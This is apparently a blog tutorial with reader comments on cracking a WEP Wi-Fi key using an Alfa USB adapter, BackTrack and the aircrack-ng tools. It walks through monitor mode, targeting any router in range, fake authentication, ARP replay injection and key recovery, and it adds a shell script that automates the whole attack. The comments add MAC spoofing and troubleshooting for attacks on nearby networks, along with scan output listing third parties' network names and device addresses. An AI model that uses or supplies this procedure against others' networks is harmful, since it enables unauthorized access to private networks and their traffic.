Alright, so I did the unboxing of the Alfa AWUS036NH a few months ago and have been putting off making a post on how to crack WEP passwords with it until now. So here it is, I finally have done it. This post contains step-by-step instructions on how to crack WEP with the Alfa wireless N USB adapter. I will try to explain as much as possible, but if all you want to do is crack WEP in easy steps without wanting to know what the hell you're doing, this post is for you.
Let's start by talking about what you need. Of course you have to have the Alfa AWUS036NH adapter; if you don't have it, buy it. The second thing you need is a copy of BackTrack 4 R2, which can be downloaded from their website for free. I highly recommend you either burn it to a DVD or make a bootable USB from it. That's it; if you have those, you're ready to go!
Step #1:
Boot into BackTrack 4 R2 and plug in the Alfa adapter. Click Here for instructions on how to make a bootable Linux USB.
Step #2:
Open a Konsole (or any other terminal) and type the command below, which starts networking.
/etc/init.d/networking start
It might take some time to load, but once it finishes and the root prompt is displayed, go to step 3.
Step #3:
You are now going to put the Alfa card into monitor mode. But first you need to find out which interface the Alfa card has been assigned to.
airmon-ng
You should now see one, possibly two, adapters. Look for the one with the chipset Ralink RT2870/3070 (this is the Alfa) and check the interface column. It will be either wlan0 or wlan1; the commands below assume wlan0, so substitute wlan1 if that is what airmon-ng showed. First stop that interface:
airmon-ng stop wlan0
Now start the interface again, which brings it up in monitor mode.
airmon-ng start wlan0
Run airmon-ng again and you should see the Ralink RT2870/3070 also listed under a new interface, mon0. That is the monitor-mode interface all the remaining steps use (when you are finished, airmon-ng stop mon0 removes it and returns the card to managed mode).
Step #4:
Now you have to scan for the wireless networks in your area that are being transmitted by wireless routers. Use the following command to do this:
airodump-ng mon0
A big list of wireless routers will now be displayed on the screen. Once you have found the one you want to crack, press Ctrl+C to stop the scanning. Now write down its channel (CH), BSSID and ESSID, as you are going to need these for the commands to come. Check that its ENC column says WEP; the attack below does not apply to WPA/WPA2 networks.
Step #5:
Now you are going to lock airodump-ng onto the wireless router of your choice, on its channel only, and write everything it captures to files with the prefix wep, using the following command:
airodump-ng -w wep -c [channel #] --bssid [bssid #] mon0
NOTE: do not enter the [ ] brackets into the command
Step #6:
Open a new console window but do not close the one running step 5. We are now going to fake-authenticate the Alfa card with the access point, so that the AP accepts frames sent from our MAC address (without this the injected packets in step 7 are dropped):
aireplay-ng -1 0 -a [bssid #] mon0
NOTE: do not enter the [ ] brackets into the command
Step #7:
Just like in step 6, open another console window. This time we are going to start the ARP request replay attack: aireplay-ng waits for an ARP request on the network and re-injects it over and over, which makes the access point answer with a stream of new encrypted packets, each carrying a fresh IV:
aireplay-ng -3 -b [bssid #] mon0
NOTE: do not enter the [ ] brackets into the command
Step #8:
Now go back to the first console window (step 5), which is locked on the wireless router, and watch the #Data column. It counts the captured data frames with an IV, and it has to get over 30,000 before you can continue to step 9; this is VERY IMPORTANT. It might take over an hour to reach 30,000. If #Data stays near zero, the replay attack has nothing to replay: an ARP request only appears when a client is active on the network, and the fake authentication in step 6 must have succeeded.
Step #9:
Once the #Data column is over 30,000, go back to the third console window (step 7) and press Ctrl+C to stop the replay attack.
We are now going to crack the wireless router's WEP key. Run ls (or dir) to find the .cap file with the wep prefix from step 5. If it is your first time doing this tutorial it will be named wep-01.cap; airodump-ng increments the number on every run, so pick the newest one. Now enter the following command to crack the WEP key:
aircrack-ng wep-01.cap
Scroll through the output and the key should be there, on the line reading KEY FOUND!. If aircrack-ng reports that it failed and needs more IVs, leave steps 5 and 7 running longer and run it again.
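The nine steps above, collected into one script as an added example; this is not code from the original post. It assumes the aircrack-ng tools as shipped in BackTrack 4 R2, that airmon-ng names the monitor interface mon0 (as in the post), and that airodump-ng's -w wep prefix writes wep-01.csv alongside wep-01.cap. The script validates the channel and BSSID, watches the IV count in that CSV instead of eyeballing the #Data column, warns when the count stops rising (the symptom several people describe in the comments), and takes the card out of monitor mode when it exits. The file name wepcrack.sh, the IV_THRESHOLD variable and the sample CSV rows are the example's own.

```shell
#!/bin/sh
# wepcrack.sh: added example, not code from the original post. Runs steps
# 3 to 9 of the tutorial around the aircrack-ng tools in BackTrack 4 R2.
# Assumptions: airmon-ng creates the monitor interface as mon0 (as in the
# post), and airodump-ng's "-w wep" prefix writes wep-01.csv beside
# wep-01.cap. Usage: ./wepcrack.sh <iface> <channel> <bssid>

PREFIX=wep                            # airodump-ng -w prefix from step 5
IV_THRESHOLD=${IV_THRESHOLD:-30000}   # the post's "over 30,000" rule of thumb
MON=mon0

# A BSSID is six hex octets separated by colons.
valid_bssid() {
    h='[0-9a-fA-F][0-9a-fA-F]'
    case "$1" in
        $h:$h:$h:$h:$h:$h) return 0 ;;
    esac
    return 1
}

# 2.4 GHz channels 1-14 only.
valid_channel() {
    case "$1" in
        [1-9]|1[0-4]) return 0 ;;
    esac
    return 1
}

# Print the "# IV" column (11th field) of airodump-ng's CSV for one BSSID;
# prints 0 if the file or the BSSID is not there yet.
iv_count() {    # iv_count <csv file> <bssid>
    [ -r "$1" ] || { echo 0; return 0; }
    awk -F',' -v want="$(printf '%s' "$2" | tr 'a-f' 'A-F')" '
        toupper($1) == want { gsub(/ /, "", $11); print $11 + 0; found = 1; exit }
        END { if (!found) print 0 }' "$1"
}

# Poll the CSV until the IV count reaches the threshold. A count that does
# not move means nothing is producing new IVs: the fake auth (step 6) or
# the ARP replay (step 7) is not working, or no client is on the network.
wait_for_ivs() {    # wait_for_ivs <csv file> <bssid> <threshold> [poll seconds]
    last=-1
    while :; do
        now=$(iv_count "$1" "$2")
        printf '%s IVs\n' "$now"
        [ "$now" -ge "$3" ] && return 0
        [ "$now" -eq "$last" ] && echo 'no new IVs: check fake auth, ARP replay and client activity' >&2
        last=$now
        sleep "${4:-10}"
    done
}

# Constructed sample in the layout of airodump-ng's CSV (the IV figures are
# made up) so iv_count can be exercised without a real capture.
sample_csv() {
    printf '%s\n' \
'BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key' \
'00:04:ED:AB:7C:63, 2011-09-07 15:37:00, 2011-09-07 15:48:00,  1,  54, WEP , WEP, , -59,      580,    31245,   0.  0.  0.  0,   4, AXIS, ' \
'00:13:49:6E:1C:F7, 2011-09-07 15:37:00, 2011-09-07 15:48:00,  6,  54, WEP , WEP, , -66,      465,        0,   0.  0.  0.  0,  13, true_homewifi, '
}

main() {
    [ $# -eq 3 ] || { echo "usage: $0 <iface> <channel> <bssid>" >&2; return 2; }
    iface=$1; chan=$2; bssid=$3
    valid_channel "$chan" || { echo "bad channel: $chan" >&2; return 2; }
    valid_bssid "$bssid"  || { echo "bad BSSID: $bssid" >&2; return 2; }
    # airodump-ng numbers its output files; refuse to guess which one is ours.
    [ -e "$PREFIX-01.cap" ] && { echo "$PREFIX-01.cap exists, move it first" >&2; return 1; }

    airmon-ng start "$iface" "$chan" >/dev/null                                   # step 3
    airodump-ng -w "$PREFIX" -c "$chan" --bssid "$bssid" "$MON" >/dev/null 2>&1 &  # step 5
    dump=$!
    trap 'kill $dump $replay 2>/dev/null; airmon-ng stop $MON >/dev/null 2>&1' INT TERM EXIT
    sleep 3
    aireplay-ng -1 0 -a "$bssid" "$MON" || return 1                               # step 6: fake auth
    aireplay-ng -3 -b "$bssid" "$MON" >/dev/null 2>&1 &                           # step 7: ARP replay
    replay=$!
    wait_for_ivs "$PREFIX-01.csv" "$bssid" "$IV_THRESHOLD"                        # step 8
    kill "$replay" "$dump"
    aircrack-ng -b "$bssid" "$PREFIX-01.cap"                                      # step 9
}

# Start the attack only when invoked as wepcrack.sh, so the file can also be
# sourced to use iv_count on an existing capture.
case "$0" in
    wepcrack.sh|*/wepcrack.sh) main "$@" ;;
esac
```

Run it as ./wepcrack.sh wlan0 6 00:11:22:33:44:55 (placeholder values). The threshold is only the post's rule of thumb: aircrack-ng may succeed with fewer IVs or ask for more, so if it reports a failure, keep capturing and run it again on the same .cap file.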
Doesn't work.
After step 6 I get:
Sending Auth request (open system) (ack)
auth successful
sending association request (ack)
association successful
root@bt:
Step 7:
saving ARP requests
read 30000 packets (is advancing fast) (got 0 ARP requests and 4 ACKs) (every time I do step 6 I get one more ACK here).
But airmon doesn't see any data packets, that stays at 0.
Hey. Everything is working fine. You just need to wait for someone to access the network in order for it to start capturing packets. Let me know if you have any more questions.
Thanks for very useful and very cool explanation!
I have the same adapter but I didn’t know how to crack WEP.
Although I did not know what BackTrack was about 6 hours ago, I followed these instructions and now it's working very well.
You are a genius.
Yet, I have a question.
I am on step 8 and my laptop has been gathering packets for more than 1 hour.
But Data# is 60, which is very few.
So even if I leave my laptop on for 10 days, I will not be able to gather enough packets.
The AP signal is good and close though.
Why is this happening?
Could you please help me out?
Thank you very much.
Sincerely, HappyHour.
Hey, glad to hear that for the most part it's working for you. The issue you are having is because the Alfa adapter should be injecting packets into the access point. But for some reason it's not doing that, so you will have to wait for other computers to be active on the network. Once other computers are on the access point the Data# will go up really fast. I have been looking for a fix to this problem and I will try to update my post if I find the solution. Good luck!
Thanks for your fast and good reply.
I tried it 3 more times but it had the same problem.
So as you mentioned, I tried to find other computers, but there were no WEP signals except the one I failed to crack.
However, there are WPA and WPA2 signals and I wonder if I can crack those with the same method.
By learning BackTrack little by little, it becomes more interesting and fun.
Again, thanks for blogging useful stuff.
Take care!
Will this work as described with the AWUS036H 1w adapter as well?
Also I have just one specific question. In another tutorial they used:
airodump-ng -c 6 --bssid 00:0F:CC:7D:5A:74 -w data mon0
instead of your:
airodump-ng -w wep -c [channel #] --bssid [bssid #] mon0
Can you explain the differences?
Btw, can you please update the article with how to take it out of monitor mode back into managed mode without having to unplug and re-plug the adapter or reboot?
Thanks, nice write-up and I like this site. By the way I am using Windows 7 virtualization! (Yes, modern man's cop-out 8P)
It seems my post was deleted or something..
Again, will this write up work for an AWUS036h 1w?
How do you take the card out of monitor mode and put it back into managed without having to disconnect and reconnect it or rebooting?
Hey eddie,
Yes, the instructions in this post will work with the AWUS036H 1W. From what I hear the AWUS036H 1W is actually more compatible with BackTrack. Now for your question on taking the card out of monitor mode, try using this command: airmon-ng stop mon0. It should now only show up as wlan0 when you type airmon-ng.
Hey, it worked fine, but for me the interface was wlan1, not mon0. You should type this as a second step after airmon-ng, which is:
airmon-ng stop (interface) -> interface here is wlan0
ifconfig (interface) down -> interface here is wlan1
macchanger --mac 00:11:22:33:44:55 wlan1
airmon-ng start wlan1
then:
airodump-ng wlan1
My USB is the Alfa AWUS036NH and I got it working fine.
Now I'm working on WPA/WPA2, so post to help, and feedback on the output results.
Whoever gets any info about WPA, please post here to help.
The hard step is to get a dictionary and wordlist to fix in BT5.
Thanks all
Thanks for a very good post. I followed it step by step and succeeded only with the one that is close to my wireless adapter, but not with the others nearby, so I'd like to ask you for some advice.
1. When using the airodump-ng command, the screen shows a list of wireless routers as attached below:
 CH  2 ][ Elapsed: 11 mins ][ 2011-09-07 15:48

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:04:ED:AB:7C:63  -59      580       17    0   1  54   WEP  WEP         AXIS
 00:13:49:6E:1C:F7  -66      465        0    0   6  54   WEP  WEP         true_homewifi
 00:1F:A4:B5:81:FB  -75      422        0    0   1  54 . WEP  WEP         true_homewifi_1C
 00:1F:A4:B3:73:C1  -75      427      321    0   1  54 . WPA  TKIP   PSK  Pattanpong
 00:02:6F:89:8F:F9  -81      163      509    0   1  54 . OPN              Kan-Ya-Rat-AP3
 C8:D5:FE:BA:CD:08  -83       97        0    0   6  54   WEP  WEP         Wanida
 00:4F:6A:05:68:3E  -83       23        4    0   6  54   WPA2 CCMP   PSK  Airlive
 00:02:CF:94:51:C4   -1        0        0    0 108  -1

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

 00:04:ED:AB:7C:63  CC:05:1B:D5:B8:6E  -61   0 -24     3       23
 00:04:ED:AB:7C:63  44:2A:60:7F:B6:3F  -85  54 - 1     0       19  AXIS
 00:1F:A4:B3:73:C1  EC:55:F9:E3:3A:89  -75  24 -54     0      297
 C8:D5:FE:BA:CD:08  90:CF:15:67:F4:6C   -1   1 - 0     0        2
 00:4F:6A:05:68:3E  B0:48:7A:10:9E:FC  -83   0 - 1     0        5
 00:4F:6A:05:68:3E  00:1F:3B:4D:92:E7  -81   2 - 1     0        4
 00:02:CF:94:51:C4  14:5A:05:35:96:1E  -81   0 - 1     0        3
 root@root:~#
I started with the one closest to my laptop and it worked quite well, but once I selected the others (WEP) randomly and did exactly the same as I had done, it always failed at step 6, with the messages "Sending Authentication Request (Open System)" and also "Attack was unsuccessful". Could you please tell me how to select which one of them, i.e. the one that has the highest % signal strength (from NetStumbler)?
2. Sometimes step 6 is OK after running for a while, but when step 7 is started it runs and then hangs up. I noticed that everything stops, especially the last line. Until the data or packets shown in step 5 are moving, just for 5-10 minutes, the last line in step 7 runs up to 300000-500000 for some time, which makes me smile and smile, as shown below:
root@root:~# aireplay-ng -3 -b 00:13:49:6e:1c:f7 mon0
No source MAC (-h) specified. Using the device MAC (00:1F:1F:48:56:46)
06:11:29 Waiting for beacon frame (BSSID: 00:13:49:6E:1C:F7) on channel 6
Saving ARP requests in replay_arp-0905-061129.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
^Cad 314235 packets (got 13 ARP requests and 76507 ACKs), sent 99533 packets...(500 pps)
root@root:~#
When I do aircrack-ng in step 9 it fails. They recommend trying again with the next 5000 IVs, since I got a large number of packets. Is there any mistake or anything unforeseen that I should correct? Please advise.
Many Thanks,
Hi buddy, I have the same Alfa card as you; I'm using the BT5 live CD. How did you load the 2870/3070 driver into BT? When I start networking ini string I just have wlan0, and the rt2870 or the 3070 aren't listed either. I have the mini CD you have too. Can you tell me step by step how to install the drivers I need for monitor mode? Thanks, any help welcome.
Please help me:
I'm stuck in step 6:
The interface MAC (00:C0:CA:3E:D4:AF) doesn’t match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
02:30:35 Waiting for beacon frame (BSSID: 5C:D9:98:EF:20:F9) on channel -1
02:30:35 mon0 is on channel -1, but the AP uses channel 6
Hey guys, I am new to this but I'm getting the hang of it. There is one little problem that is stopping me from doing magic. I follow all the steps, but on step #6 ("Open a new console window") I can't open it! I have no icon that will open a new console or command line. I tried Ctrl+Z but it stops it; I try Ctrl+Z then %1 and it still stops it! How the heck can I open another console window without stopping aireplay-ng from running in the background? Help is urgent! Thanks!
Hey, please confirm and post whether the AWUS036NH works in BackTrack 5 R1, because I plan on buying it. Thank you in advance.
Correction: "works" as in, can it perform a successful attack? Also, will it work in VirtualBox?